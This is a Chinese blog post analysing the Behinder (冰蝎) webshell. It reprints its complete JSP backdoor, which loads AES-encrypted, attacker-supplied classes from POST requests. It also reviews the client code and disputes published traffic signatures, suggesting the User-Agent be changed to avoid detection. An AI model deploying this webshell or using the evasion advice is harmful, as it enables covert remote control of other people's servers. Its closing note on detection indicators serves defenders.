百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程字典 > 正文

前尘——流量中的无法捕捉的蝎子(前尘蝎子精是多少关)

toyiye 2024-08-10 21:26 7 浏览 0 评论

前言

一天一个朋友跑过来,问我冰蝎又没有魔改的版本。说自己冰蝎执行命令被拦截了,于是我开始借此机会分析冰蝎源码,寻找其特征。

JSP一句话木马分析

冰蝎两端二开,首先分析其JSP
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
为了方便分析将其带入idea中进行格式化

一个类名为U的类继承ClassLoader,这里我只给大家解释一点,避免对classloader解释太多让大家不易理解。classloader就是将class文件加载到JVM中。读者理解这一点就行……

获取request对象,然后通过request对象获取请求方法。如果是POST方法则向下处理……

定义一个密钥,因为其采用aes加密,然后将这个key存入session对象,key为u,value为密钥。

通过Cipher对象实现了AES加密

然后初始化这个加密算法
init(int opmode, Certificate certificate)
init这个api是使用给定证书中的公钥初始化此密码。然后此处解决一个疑问,此处的aes加密还是解密是我困惑的一个点,后来差文档发现第一个参数opmode支持两种模式ENCRYPT_MODE , DECRYPT_MODE , WRAP_MODE或 UNWRAP_MODE,然后他传了一个int类型的2即为解密。
然后将上文声明的key当作密钥传入。自此aes方法声明结束。

然后实例化当前类,对于这种链式操作很大程度上减少了代码量,但是对于分析者不怎么友好。这种写法需要从内向外分析。
1.调用request对象的getReader然后逐行读取请求包里的内容。
2.调用sun包下misc中Base64Decoder方法对其进行base64解密
3.调用上文中实例的aes算法对象的dofinal对其进行aes解密
4.将内容传给声明的方法g中,内部调用defineClass方法动态解析内容成class内容

这里主要是defineClass方法给出api,可以搜索这个api文档深入理解。

聊聊这样实现的优势

我不得不承认的冰蝎作者对webshell管理端这样的先河开辟者的佩服。原因如下:对于一个webshell的控制,其最主要的功能在于命令执行也就是Runtime类。客户端向服务端发送命令,服务端获取内容然后带入exec当中。但是冰蝎作者没有这么做,他选择类加载的方式,客户端发送给服务端类文件由服务端使用classloader加载到jvm。这样做最大的好处就是可扩展性,可以做的事情不在局限于runtime类,让可以做的事情无限放大。从0到1是个大问题……

客户端

接下来看看客户端目录结构,让我庆幸的是。当我再次看到这样的目录结构让我留下的阔别已久的泪水,那些老架构项目的架构烂的一塌糊涂。这样的架构,分层思想给我接下来的分析减少了很大压力,直接pom下载依赖。
冰蝎使用了sqllite数据库

核心表就两张,hosts和shell表。多对多的关系,保存shell的记录。
1.dao层负责查询数据
2.entity层负责数据库和应用程序的实体映射
3.ui负责界面
4.util工具包
5.payload是客户端的功能实现

功能实现自己看吧,无非创建文件删除文件这些没啥说的。

聊聊特征

https://www.freebuf.com/sectool/247009.html 我一句这篇文章来做一个反驳吧
1.content-type Content-Type: application/octet-stream属于强特征。这种属于流传输,而用到流传输的地方多了去了,不能作为特征。
2.user-Agent 。我看了源码中

冰蝎子中默认定义的agent头,查阅后并未发现敏感特殊字样,都为正常ua头。如果实在担心可以修改默认的ua头。

Accept&Cache-Control,文章中说如果不自行定义则会使用默认的
Accept: text/html, image/gif, image/jpeg,
; q=.2, /*; q=.2
Cache-Control: no-cache
Pragma: no-cache
User-Agent: java/1.8
这很正常,大多数请求都不会自己定义。
综上所述,以上几种特征都属于强行找特征。如果有必要,建议只修改ua头即可。

总结

看完整个代码之后的感觉就是,冰蝎作者的开发功底可以,其中用到多种设计模式,方法的抽离性比较强。每个方法都放到了该放的位置,但是数据库设计的个人认为有很多冗余字段存在于host和shell表中。
最后提一嘴,

除流量特征以外的内存特征session 中的key为u算不算一个呀,这个作为内存马检测算不算很有力。

相关推荐

为何越来越多的编程语言使用JSON(为什么编程)

JSON是JavascriptObjectNotation的缩写,意思是Javascript对象表示法,是一种易于人类阅读和对编程友好的文本数据传递方法,是JavaScript语言规范定义的一个子...

何时在数据库中使用 JSON(数据库用json格式存储)

在本文中,您将了解何时应考虑将JSON数据类型添加到表中以及何时应避免使用它们。每天?分享?最新?软件?开发?,Devops,敏捷?,测试?以及?项目?管理?最新?,最热门?的?文章?,每天?花?...

MySQL 从零开始:05 数据类型(mysql数据类型有哪些,并举例)

前面的讲解中已经接触到了表的创建,表的创建是对字段的声明,比如:上述语句声明了字段的名称、类型、所占空间、默认值和是否可以为空等信息。其中的int、varchar、char和decimal都...

JSON对象花样进阶(json格式对象)

一、引言在现代Web开发中,JSON(JavaScriptObjectNotation)已经成为数据交换的标准格式。无论是从前端向后端发送数据,还是从后端接收数据,JSON都是不可或缺的一部分。...

深入理解 JSON 和 Form-data(json和formdata提交区别)

在讨论现代网络开发与API设计的语境下,理解客户端和服务器间如何有效且可靠地交换数据变得尤为关键。这里,特别值得关注的是两种主流数据格式:...

JSON 语法(json 语法 priority)

JSON语法是JavaScript语法的子集。JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔花括号保存对象方括号保存数组JS...

JSON语法详解(json的语法规则)

JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔大括号保存对象中括号保存数组注意:json的key是字符串,且必须是双引号,不能是单引号...

MySQL JSON数据类型操作(mysql的json)

概述mysql自5.7.8版本开始,就支持了json结构的数据存储和查询,这表明了mysql也在不断的学习和增加nosql数据库的有点。但mysql毕竟是关系型数据库,在处理json这种非结构化的数据...

JSON的数据模式(json数据格式示例)

像XML模式一样,JSON数据格式也有Schema,这是一个基于JSON格式的规范。JSON模式也以JSON格式编写。它用于验证JSON数据。JSON模式示例以下代码显示了基本的JSON模式。{"...

前端学习——JSON格式详解(后端json格式)

JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScriptProgrammingLa...

什么是 JSON:详解 JSON 及其优势(什么叫json)

现在程序员还有谁不知道JSON吗?无论对于前端还是后端,JSON都是一种常见的数据格式。那么JSON到底是什么呢?JSON的定义...

PostgreSQL JSON 类型:处理结构化数据

PostgreSQL提供JSON类型,以存储结构化数据。JSON是一种开放的数据格式,可用于存储各种类型的值。什么是JSON类型?JSON类型表示JSON(JavaScriptO...

JavaScript:JSON、三种包装类(javascript 包)

JOSN:我们希望可以将一个对象在不同的语言中进行传递,以达到通信的目的,最佳方式就是将一个对象转换为字符串的形式JSON(JavaScriptObjectNotation)-JS的对象表示法...

Python数据分析 只要1分钟 教你玩转JSON 全程干货

Json简介:Json,全名JavaScriptObjectNotation,JSON(JavaScriptObjectNotation(记号、标记))是一种轻量级的数据交换格式。它基于J...

比较一下JSON与XML两种数据格式?(json和xml哪个好)

JSON(JavaScriptObjectNotation)和XML(eXtensibleMarkupLanguage)是在日常开发中比较常用的两种数据格式,它们主要的作用就是用来进行数据的传...

取消回复欢迎 发表评论:

请填写验证码